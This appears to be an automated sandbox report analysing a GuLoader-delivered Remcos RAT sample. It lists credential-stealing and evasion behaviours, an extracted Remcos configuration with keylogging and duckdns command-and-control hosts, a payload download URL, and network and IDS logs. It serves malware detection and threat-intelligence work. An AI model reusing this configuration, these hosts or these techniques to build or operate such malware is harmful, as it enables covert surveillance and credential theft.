Windows Analysis Report
z58Swiftcopy_MT.bat.exe

Overview

General Information

Sample name: z58Swiftcopy_MT.bat.exe
Analysis ID: 1586058
MD5: d82fc35769adac8d6c49087219b1cd93
SHA1: ff87686b1f399b3d68a580dc016e2c675b61d5c1
SHA256: 8da8762a0f3794de100bd1800856136928880e8a9d0be42eb758809bca1bd0e3
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • z58Swiftcopy_MT.bat.exe (PID: 2560 cmdline: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe" MD5: D82FC35769ADAC8D6C49087219B1CD93)
    • z58Swiftcopy_MT.bat.exe (PID: 5524 cmdline: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 2804 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 6432 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt" MD5: D82FC35769ADAC8D6C49087219B1CD93)
      • z58Swiftcopy_MT.bat.exe (PID: 4076 cmdline: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs" MD5: D82FC35769ADAC8D6C49087219B1CD93)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["wealthabundance01.duckdns.org:3981:1", "wealthabundance01.duckdns.org:3980:0", "wealthabundance002..duckdns.org:3980:0"], "Assigned name": "WEALTHBILLIONAIRES", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "wealthymannow-3N54OZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119 | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
C:\Users\user\AppData\Local\Temp\nsm9317.tmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

                  Stealing of Sensitive Information

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe, ProcessId: 5524, TargetFilename: C:\ProgramData\remcos\logs.dat
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-08T17:13:17.032953+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49748 | 43.226.229.196 | 3981 | TCP
                  2025-01-08T17:13:20.438465+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49749 | 43.226.229.196 | 3981 | TCP
                  2025-01-08T17:13:19.851927+0100 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49750 | 178.237.33.50 | 80 | TCP
                  2025-01-08T17:13:13.491271+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49747 | 109.99.162.14 | 443 | TCP

                  AV Detection

                  Source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos (configuration identical to the JSON listed above)
                  Source: z58Swiftcopy_MT.bat.exeReversingLabs: Detection: 21%
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: z58Swiftcopy_MT.bat.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49747 version: TLS 1.2
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405861
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040639C FindFirstFileA,FindClose,0_2_0040639C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_33A710F1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A76580 FindFirstFileExA,2_2_33A76580
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898

                  Networking

                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49748 -> 43.226.229.196:3981
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49749 -> 43.226.229.196:3981
                  Source: Malware configuration extractorURLs: wealthabundance01.duckdns.org
                  Source: Malware configuration extractorURLs: wealthabundance002..duckdns.org
                  Source: unknownDNS query: name: wealthabundance01.duckdns.org
                  Source: global trafficTCP traffic: 192.168.11.20:49748 -> 43.226.229.196:3981
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49750 -> 178.237.33.50:80
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49747 -> 109.99.162.14:443
                  Source: global trafficHTTP traffic detected: GET /PmprpeY34.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.yahoo.com (Yahoo)
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global traffic DNS traffic detected: DNS query: teldrum.ro
                  Source: global traffic DNS traffic detected: DNS query: wealthabundance01.duckdns.org
                  Source: global traffic DNS traffic detected: DNS query: geoplugin.net
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://certs.godaddy.com/repository/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?bbc9af5ecc12954d59c63a1771114562
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://eb2.3lift.com/sync?
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BY3&Front
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4b&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?6e329cf6426f83c8ee02e2bc96bdb46d
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?d2c6e729d235d3f335d1d4751bb8eb91
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475954920.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475803985.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476050726.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476004168.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475853439.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480920497.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ib.3lift.com/sync.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ib.adnxs.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
